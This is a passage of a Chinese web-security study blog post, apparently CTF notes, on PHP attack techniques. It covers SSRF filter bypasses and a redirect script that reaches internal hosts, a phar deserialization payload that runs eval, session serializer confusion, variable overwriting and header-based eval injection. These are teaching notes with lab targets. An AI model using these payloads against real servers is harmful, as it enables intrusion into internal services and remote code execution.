<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">IP = <span class="string">"192.168.110.1"</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">addr2dec</span><span class="params">(addr)</span>:</span></span><br><span class="line">    <span class="string">"将点分十进制IP地址转换成十进制整数"</span></span><br><span class="line">    items = [int(x) <span class="keyword">for</span> x <span class="keyword">in</span> addr.split(<span class="string">"."</span>)]</span><br><span class="line">    <span class="keyword">return</span> sum([items[i] &lt;&lt; [<span class="number">24</span>, <span class="number">16</span>, <span class="number">8</span>, <span class="number">0</span>][i] <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">4</span>)])</span><br><span class="line"> </span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dec2addr</span><span class="params">(dec)</span>:</span></span><br><span class="line">    <span class="string">"将十进制整数IP转换成点分十进制的字符串IP地址"</span></span><br><span class="line">    <span class="keyword">return</span> <span class="string">"."</span>.join([str(dec &gt;&gt; x &amp; <span class="number">0xff</span>) <span class="keyword">for</span> x <span class="keyword">in</span> [<span class="number">24</span>, <span class="number">16</span>, <span class="number">8</span>, <span class="number">0</span>]])</span><br><span class="line"> </span><br><span class="line">dec = addr2dec(IP)</span><br><span class="line"><span class="keyword">print</span> dec</span><br><span class="line"><span class="keyword">print</span> dec2addr(dec)</span><br></pre></td></tr></table></figure>

<p>测试 ok</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /ssrf.php?url=http://3232263681/neiwang.php HTTP/1.1</span><br></pre></td></tr></table></figure>

<h4 id="url绕过"><a href="#url绕过" class="headerlink" title="url绕过"></a>url绕过</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">.==&gt;。 127。0。0。1  测试 ok</span><br><span class="line">短网址  https://dwz.cn/  测试 没ok</span><br><span class="line">指向任意 ip 的域名xip.io, http://xxx.127.0.0.1.xip.io/  测试 ok  这个要注意xxx随意 但是不能没有</span><br><span class="line">GET /test.php?url=http://x.192.168.110.1.xip.io/neiwang.php HTTP/1.1</span><br></pre></td></tr></table></figure>

<p>变体字符</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">ⓔⓧⓐⓜⓟⓛⓔ.ⓒⓞⓜ  &gt;&gt;&gt;  example.com</span><br><span class="line">List:</span><br><span class="line">① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ </span><br><span class="line">⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ </span><br><span class="line">⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ </span><br><span class="line">⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ </span><br><span class="line">Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ </span><br><span class="line">ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ </span><br><span class="line">⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ </span><br><span class="line">⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿</span><br></pre></td></tr></table></figure>

<h4 id="filter-var"><a href="#filter-var" class="headerlink" title="filter_var"></a>filter_var</h4><p>使用特定的过滤器 过滤url</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">filter_var ( mixed $variable [, int $filter = FILTER_DEFAULT [, mixed $options ]] ) : mixed</span><br></pre></td></tr></table></figure>

<p>常使用的过滤器</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">FILTER_VALIDATE_EMAIL 检查是否为有效邮箱</span><br><span class="line">FILTER_VALIDATE_URL 检查是否为有效url</span><br></pre></td></tr></table></figure>

<p>绕过</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">0://baidu.com:80,google.com</span><br><span class="line">0://baidu.com:80;google.com  </span><br><span class="line">0://baidu<span class="variable">$goolge</span>.com  //利用bash的可变变量<span class="variable">$google</span>被解析为空  只使用curl </span><br><span class="line">data://text.google.com/plain;base64,[code]  这里是可以xss的</span><br></pre></td></tr></table></figure>

<h4 id="parse-url"><a href="#parse-url" class="headerlink" title="parse_url"></a>parse_url</h4><p><a href="https://skysec.top/2017/12/15/parse-url%E5%87%BD%E6%95%B0%E5%B0%8F%E8%AE%B0/#%E5%AE%9E%E6%88%98%E4%B8%80" target="_blank" rel="noopener">https://skysec.top/2017/12/15/parse-url%E5%87%BD%E6%95%B0%E5%B0%8F%E8%AE%B0/#%E5%AE%9E%E6%88%98%E4%B8%80</a></p>
<h5 id="no-1-遇到-会返回flase"><a href="#no-1-遇到-会返回flase" class="headerlink" title="no.1 遇到///会返回flase"></a>no.1 遇到///会返回flase</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">http:<span class="comment">//localhost///web/trick1/parse.php?sql=select</span></span><br><span class="line">直接返回flase</span><br></pre></td></tr></table></figure>

<h5 id="no-2-遇到-把data当作path"><a href="#no-2-遇到-把data当作path" class="headerlink" title="no.2 遇到//把data当作path"></a>no.2 遇到//把data当作path</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">http://localhost/web/trick1//parse2.php?/home/binarycloud/</span><br><span class="line">则会被当做相对url，</span><br><span class="line">此时的parse2.php?/home/binarycloud/都会被当做是data[‘path’]</span><br><span class="line">而不再是query，导致可以绕过过滤</span><br><span class="line">但是需要注意的是：此问题存在php5.4.7以前</span><br></pre></td></tr></table></figure>

<h5 id="no-3-遇到非法字符自动转为下划线"><a href="#no-3-遇到非法字符自动转为下划线" class="headerlink" title="no.3 遇到非法字符自动转为下划线_"></a>no.3 遇到非法字符自动转为下划线_</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">?url=%<span class="number">11</span> </span><br><span class="line">变成了下划线</span><br><span class="line"><span class="keyword">array</span>(<span class="number">1</span>) &#123; [<span class="string">"path"</span>]=&gt; string(<span class="number">1</span>) <span class="string">"_"</span> &#125;</span><br></pre></td></tr></table></figure>

<h5 id="no-4-解析host"><a href="#no-4-解析host" class="headerlink" title="no.4 解析host"></a>no.4 解析host</h5><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$url = <span class="string">'http://username:password@hostname:9090/path?arg=value#anchor'</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">parse_url解析的结果是</span><br><span class="line">?url=http:<span class="comment">//www.baidu.com@192.168.110.140</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">array</span>(<span class="number">3</span>) &#123; [<span class="string">"scheme"</span>]=&gt; string(<span class="number">4</span>) <span class="string">"http"</span> [<span class="string">"host"</span>]=&gt; string(<span class="number">15</span>) <span class="string">"192.168.110.140"</span> [<span class="string">"user"</span>]=&gt; string(<span class="number">13</span>) <span class="string">"www.baidu.com"</span> &#125; </span><br><span class="line">host变成了@后面的</span><br></pre></td></tr></table></figure>

<p>host利用深入</p>
<h4 id="libcurl和parse-url的解析差异"><a href="#libcurl和parse-url的解析差异" class="headerlink" title="libcurl和parse_url的解析差异"></a>libcurl和parse_url的解析差异</h4><p>parse_url</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">host: 匹配最后一个@后面符合格式的host</span><br></pre></td></tr></table></figure>

<p>libcurl</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">host：匹配第一个@后面符合格式的host</span><br></pre></td></tr></table></figure>

<p>测试</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://u:p@a.com:80@b.com/index.php</span><br></pre></td></tr></table></figure>

<p>parse_url解析结果</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">array</span>(<span class="number">5</span>) &#123;</span><br><span class="line">  [<span class="string">"scheme"</span>]=&gt;</span><br><span class="line">  string(<span class="number">4</span>) <span class="string">"http"</span></span><br><span class="line">  [<span class="string">"host"</span>]=&gt;</span><br><span class="line">  string(<span class="number">5</span>) <span class="string">"b.com"</span></span><br><span class="line">  [<span class="string">"user"</span>]=&gt;</span><br><span class="line">  string(<span class="number">1</span>) <span class="string">"u"</span></span><br><span class="line">  [<span class="string">"pass"</span>]=&gt;</span><br><span class="line">  string(<span class="number">10</span>) <span class="string">"p@a.com:80"</span></span><br><span class="line">  [<span class="string">"path"</span>]=&gt;</span><br><span class="line">  string(<span class="number">10</span>) <span class="string">"/index.php"</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>  前面的@a.com会被忽略掉   </p>
<p>libcurl解析结果</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">schema: http</span><br><span class="line">host: a.com</span><br><span class="line">user: u</span><br><span class="line">pass: p</span><br><span class="line">port: <span class="number">80</span></span><br></pre></td></tr></table></figure>

<p>  后面的@b.com会被忽略掉   </p>
<h4 id="302跳转"><a href="#302跳转" class="headerlink" title="302跳转"></a>302跳转</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$ip = $_GET[<span class="string">'ip'</span>];</span><br><span class="line">$port = $_GET[<span class="string">'port'</span>];</span><br><span class="line">$scheme = $_GET[<span class="string">'s'</span>];</span><br><span class="line">$data = $_GET[<span class="string">'data'</span>];</span><br><span class="line">header(<span class="string">"Location: $scheme://$ip:$port/$data"</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h5 id="测试"><a href="#测试" class="headerlink" title="测试"></a>测试</h5><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">paylaod </span><br><span class="line">GET /test.php?url=http://192.168.110.145/302.php%3fs%3dhttp%26ip%3d192.168.110.1%26port%3d80%26data%3dneiwang.php HTTP/1.1</span><br></pre></td></tr></table></figure>

<p>test.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$ch = curl_init(); </span><br><span class="line">curl_setopt($ch, CURLOPT_URL, $_GET[<span class="string">'url'</span>]); </span><br><span class="line">curl_setopt($ch, CURLOPT_HEADER, <span class="number">0</span>); </span><br><span class="line">curl_setopt($ch, CURLOPT_FOLLOWLOCATION, <span class="number">1</span>); <span class="comment">//支持302跳转</span></span><br><span class="line">curl_exec($ch); </span><br><span class="line">curl_close($ch); </span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>neiwang.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">var_dump($_SERVER[<span class="string">'REMOTE_ADDR'</span>]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>结果</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">string(<span class="number">13</span>) <span class="string">"192.168.110.1"</span></span><br></pre></td></tr></table></figure>

<p>ssrf还有几点问题</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">PHP的curl默认不跟随302跳转</span><br><span class="line">curl7.43上gopher协议存在%00截断的BUG，v7.49可用</span><br><span class="line">file_get_contents()的SSRF，gopher协议不能使用URLencode</span><br><span class="line">file_get_contents()的SSRF，gopher协议的302跳转有BUG会导致利用失败</span><br></pre></td></tr></table></figure>

<h2 id="反序列化"><a href="#反序列化" class="headerlink" title="反序列化"></a>反序列化</h2><p>unserialize() 反序列化</p>
<p>serialize()  序列化</p>
<h3 id="魔术方法"><a href="#魔术方法" class="headerlink" title="魔术方法"></a>魔术方法</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">__construct  当对象初始化时触发</span><br><span class="line">__destory   当对象销毁的时触发</span><br><span class="line"></span><br><span class="line">__tostring 当对象被当作字符串的时触发  </span><br><span class="line">&quot;hello&quot;.$class.&quot;world&quot;  还有file_exist 这两种情况也会触发</span><br><span class="line"></span><br><span class="line">__call    当调用无法调用的函数时触发</span><br><span class="line">__get     当访问无法访问的属性时触发  </span><br><span class="line">无法调用还有无法访问包括 不存在的 还有私有变量</span><br><span class="line"></span><br><span class="line">__sleep 当一个对象被序列化时触发</span><br><span class="line">__wakeup 当一个对象被反序列化时触发</span><br></pre></td></tr></table></figure>

<p>主要是pop链的构造 还有绕过</p>
<p>__wakeup 当成员属性的个数大于实际成员数目时，可绕过 并且在成员属性的个数前面加上+ 也可以</p>
<p>私有变量 反序列化后 会生成两个%00 要注意</p>
<p>反序列化还有一个特性 当反序列化足够多的字符时，后面的数据就会被扔掉 比如</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a:1:&#123;s:4:&quot;user&quot;;s:51:&quot;O:4:&quot;user&quot;:1:&#123;s:4:&quot;test&quot;;s:17:&quot;&lt;?php phpinfo()?&gt;&quot;;&#125;&quot;;&#125;</span><br></pre></td></tr></table></figure>

<p>最后的三个字符”;}不影响反序列化，当反序列化足够多的字符时，剩下的数据，会被抛弃 前面有s:17的字符个数限制，所以当反序列化17个字符的时候，后面的就被仍掉了</p>
<h3 id="phar"><a href="#phar" class="headerlink" title="phar"></a>phar</h3><p>phar是php中的一个打包文件，类似javaz中的war</p>
<p>php提供一个phar类允许我们处理phar文件相关操作。注意要将php.ini中的phar.readonly选项设置为Off或者在代码中加上 ini_set(“phar.readonly”,0); 这一句</p>
<p>phar文件的meta-data部分在存储时会被序列化，解析时，会反序列化处理</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="meta">&lt;?php</span>    </span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">User</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $a;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;a=<span class="string">'phpinfo();'</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span></span>&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="keyword">$this</span>-&gt;a);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">@unlink(<span class="string">'phar.phar'</span>); </span><br><span class="line">$phar=<span class="keyword">new</span> phar(<span class="string">"phar.phar"</span>);         <span class="comment">//后缀名必须为phar</span></span><br><span class="line">$phar-&gt;startBuffering();             <span class="comment">//开始缓冲Phar写操作</span></span><br><span class="line">$phar-&gt;setStub(<span class="string">"&lt;?php __HALT_COMPILER(); ?&gt;"</span>); <span class="comment">//phar文件标志，可以加上其他文件头，以绕过检测 "GIF89a"."<span class="meta">&lt;?php</span> __HALT_COMPILER();"  </span></span><br><span class="line">$o=<span class="keyword">new</span> User();</span><br><span class="line">$phar-&gt;setMetadata($o);             <span class="comment">//添加meta-data数据</span></span><br><span class="line">$phar-&gt;addFromString(<span class="string">"test.txt"</span>,<span class="string">"test"</span>);</span><br><span class="line">$phar-&gt;stopBuffering();</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">file_get_contents($_GET[<span class="string">'url'</span>]);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">User</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">    <span class="keyword">public</span> $a;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span><span class="params">()</span></span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">$this</span>-&gt;a=<span class="string">''</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span><span class="params">()</span></span>&#123;</span><br><span class="line">        <span class="keyword">eval</span>(<span class="keyword">$this</span>-&gt;a);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">    </span><br><span class="line">?url=phar:<span class="comment">//phar.phar/test.txt</span></span><br></pre></td></tr></table></figure>

<p>能够执行phpinfo()</p>
<h3 id="session中的反序列化"><a href="#session中的反序列化" class="headerlink" title="session中的反序列化"></a>session中的反序列化</h3><p>php有三种反序列化方式</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">php_binary:键名的长度对应的ASCII字符+键名+键值经过serialize()函数序列化处理的值</span><br><span class="line"></span><br><span class="line">php:键名+竖线+键值经过serialize()函数序列处理的值</span><br><span class="line"></span><br><span class="line">php_serialize(php&gt;5.5.4):经过serialize()函数序列化处理的值</span><br></pre></td></tr></table></figure>

<p>如果数据以php_serialize的方式序列化，以php的方式反序列化，就会出现问题</p>
<p>通过php_serialize传入值，在加上一个竖线| ，伪造这样一串数据，</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">s:5:&quot;|code&quot;;</span><br></pre></td></tr></table></figure>

<p>这串数据当被php这种序列化方式解析的时候，键就变成了 s:5:”|  值就变成了 code 也就是值不再被当作字符串，而是单独的一部分被反序列化</p>
<h2 id="变量覆盖"><a href="#变量覆盖" class="headerlink" title="变量覆盖"></a>变量覆盖</h2><h3 id="extract"><a href="#extract" class="headerlink" title="extract"></a>extract</h3><h3 id><a href="#" class="headerlink" title="$"></a>$</h3><h3 id="parse-str"><a href="#parse-str" class="headerlink" title="parse_str"></a>parse_str</h3><h3 id="全局变量注册"><a href="#全局变量注册" class="headerlink" title="全局变量注册"></a>全局变量注册</h3><p>auth变量没有设置，但是访问参数内有auth变量，auth会被自动的设置  前提   register_globals=ON   </p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ($auth) &#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"private!"</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="import-request-variables"><a href="#import-request-variables" class="headerlink" title="import_request_variables()"></a>import_request_variables()</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$auth = <span class="string">"0"</span>;</span><br><span class="line">import_request_variables(<span class="string">"G"</span>);</span><br><span class="line"><span class="keyword">if</span> ($auth == <span class="number">1</span>) &#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"private!"</span>;</span><br><span class="line">&#125; </span><br><span class="line"><span class="keyword">else</span> &#123;</span><br><span class="line"><span class="keyword">echo</span> <span class="string">"public!"</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>访问auth=1 就会自动设置auth变量</p>
<h2 id="无参数函数"><a href="#无参数函数" class="headerlink" title="无参数函数"></a>无参数函数</h2><h3 id="超全局变量-ENV"><a href="#超全局变量-ENV" class="headerlink" title="超全局变量$_ENV"></a>超全局变量$_ENV</h3><p>$_ENV 通过getenv函数调用</p>
<p>getenv获取当前的环境变量<br>array_rand 从数组中随机的获取元素<br>array_flip() 交换数组中的键和值 键变为值 值变为键</p>
<h3 id="getallheaders"><a href="#getallheaders" class="headerlink" title="getallheaders"></a>getallheaders</h3><p>后台代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">eval</span>($_GET[<span class="string">'code'</span>]);</span><br></pre></td></tr></table></figure>

<p>请求头</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">GET /fuzz.php?code=eval(getallheaders()[&apos;P1k&apos;]); HTTP/1.1</span><br><span class="line">Host: 127.0.0.1</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">DNT: 1</span><br><span class="line">p1k: phpinfo();</span><br><span class="line">Connection: close</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br></pre></td></tr></table></figure>

<p>这种情况有[]参数 不能绕过正则 要是有正则 可以通过current next end pos获取元素<br>注意getallheaders 只适用于apache 因为他是apache的函数</p>
<h2 id="配置函数"><a href="#配置函数" class="headerlink" title="配置函数"></a>配置函数</h2><h3 id="session"><a href="#session" class="headerlink" title="session"></a>session</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ini_set(&apos;session.serialize_handler&apos;, &apos;需要设置的引擎&apos;);</span><br><span class="line">session_start(&apos;serialize_handler=需要设置的引擎&apos;)</span><br></pre></td></tr></table></figure>

<h2 id="读写文件"><a href="#读写文件" class="headerlink" title="读写文件"></a>读写文件</h2><p>readfile()</p>
<p>file_get_contents</p>
<p>file_put_contents</p>
<p>dirname</p>
<h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><p> <a href="https://www.fuzzer.xyz/2019/03/07/CTF命令执行及绕过技巧/" target="_blank" rel="noopener">https://www.fuzzer.xyz/2019/03/07/CTF%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%8F%8A%E7%BB%95%E8%BF%87%E6%8A%80%E5%B7%A7/</a> </p>
<p> <a href="http://j0k3r.top/2019/01/30/SSRF/#0x01-IP进制转换" target="_blank" rel="noopener">http://j0k3r.top/2019/01/30/SSRF/#0x01-IP%E8%BF%9B%E5%88%B6%E8%BD%AC%E6%8D%A2</a> </p>
<p> <a href="https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/" target="_blank" rel="noopener">https://skysec.top/2019/03/29/PHP-Parametric-Function-RCE/</a> </p>
<p> <a href="https://www.smi1e.top/通过一道审计题了解ssrf/" target="_blank" rel="noopener">https://www.smi1e.top/%E9%80%9A%E8%BF%87%E4%B8%80%E9%81%93%E5%AE%A1%E8%AE%A1%E9%A2%98%E4%BA%86%E8%A7%A3ssrf/</a> </p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/10/10/jsonp/" rel="next" title="jsonp">
                <i class="fa fa-chevron-left"></i> jsonp
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/10/15/流量分析/" rel="prev" title="流量分析">
                流量分析 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          
  <div class="comments" id="comments">
    
  </div>


        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview">
            Overview
          </li>
        </ul>
      

      <section class="site-overview sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
          <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="John Doe">
          <p class="site-author-name" itemprop="name">John Doe</p>
           
              <p class="site-description motion-element" itemprop="description"></p>
          
        </div>
        <nav class="site-state motion-element">

          
            <div class="site-state-item site-state-posts">
              <a href="/archives/">
                <span class="site-state-item-count">47</span>
                <span class="site-state-item-name">posts</span>
              </a>
            </div>
          

          

          

        </nav>

        

